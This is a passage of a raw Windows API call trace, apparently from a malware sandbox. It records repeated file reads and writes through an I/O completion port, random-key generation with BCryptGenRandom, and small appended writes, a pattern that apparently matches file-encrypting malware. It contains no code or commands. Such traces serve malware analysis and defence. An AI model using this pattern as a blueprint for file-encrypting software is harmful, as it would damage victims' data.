lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.432] CloseHandle (hObject=0x2a8) returned 1 [0154.432] free (_Block=0x3df0008) [0154.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.445] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x523e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.460] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3550, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.479] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.480] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.480] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.480] free (_Block=0x3e305b8) [0154.480] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.480] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.481] free (_Block=0x1fa91d0) [0154.481] free (_Block=0x1fa2ed8) [0154.481] free (_Block=0x1fa90b8) [0154.481] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0154.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.493] CloseHandle (hObject=0x3cc) returned 1 [0154.493] free (_Block=0x3e70008) [0154.493] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.508] CloseHandle (hObject=0x2a4) returned 1 [0154.508] free (_Block=0x3ef0008) [0154.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.509] CloseHandle (hObject=0x338) returned 1 [0154.509] free (_Block=0x1ff1e60) [0154.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.531] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.532] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.532] free (_Block=0x3e305b8) [0154.532] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.532] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.532] free (_Block=0x1fa91d0) [0154.532] free (_Block=0x1fa2ed8) [0154.532] free (_Block=0x1fa90b8) [0154.532] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.532] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.555] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.555] free (_Block=0x3e305b8) [0154.555] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.555] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.556] free (_Block=0x1fa91d0) [0154.556] free (_Block=0x1fa2ed8) [0154.556] free (_Block=0x1fa90b8) [0154.556] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.569] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.569] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.569] free (_Block=0x3e305b8) [0154.569] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.569] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.569] free (_Block=0x1fa91d0) [0154.570] free (_Block=0x1fa2ed8) [0154.570] free (_Block=0x1fa90b8) [0154.570] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0154.570] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.583] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.583] free (_Block=0x3e305b8) [0154.583] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.583] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.583] free (_Block=0x1fa91d0) [0154.583] free (_Block=0x1fa2ed8) [0154.583] free (_Block=0x1fa90b8) [0154.584] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.597] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.599] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.599] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.599] free (_Block=0x3e305b8) [0154.599] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.599] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.599] free (_Block=0x1fa91d0) [0154.599] free (_Block=0x1fa2ed8) [0154.599] free (_Block=0x1fa90b8) [0154.599] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.614] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.615] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.615] free (_Block=0x3e305b8) [0154.615] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.615] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.616] free (_Block=0x1fa91d0) [0154.616] free (_Block=0x1fa2ed8) [0154.616] free (_Block=0x1fa90b8) [0154.616] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0154.627] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.628] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0154.628] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.629] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0154.633] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.633] free (_Block=0x3e305b8) [0154.633] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.633] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.634] free (_Block=0x1fa91d0) [0154.634] free (_Block=0x1fa2ed8) [0154.634] free (_Block=0x1fa90b8) [0154.634] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0154.634] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0158.935] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0158.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0158.939] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0158.942] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x27d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0158.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0158.979] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0158.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.069] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0159.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.080] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0xa9f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0159.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.089] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.102] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1f90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0159.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.120] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6f43, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.125] CloseHandle (hObject=0x2a8) returned 1 [0159.125] free (_Block=0x1ff1e60) [0159.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.125] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x6ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.201] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1e7b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.284] CloseHandle (hObject=0x308) returned 1 [0159.284] free (_Block=0x3d70450) [0159.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.295] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0159.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.304] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4ec6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0159.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.377] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x49c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0159.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0159.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0159.391] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.391] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.391] free (_Block=0x3e305b8) [0159.391] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.391] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.391] free (_Block=0x1fa91d0) [0159.392] free (_Block=0x1fa2ed8) [0159.392] free (_Block=0x1fa90b8) [0159.392] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0159.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0159.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 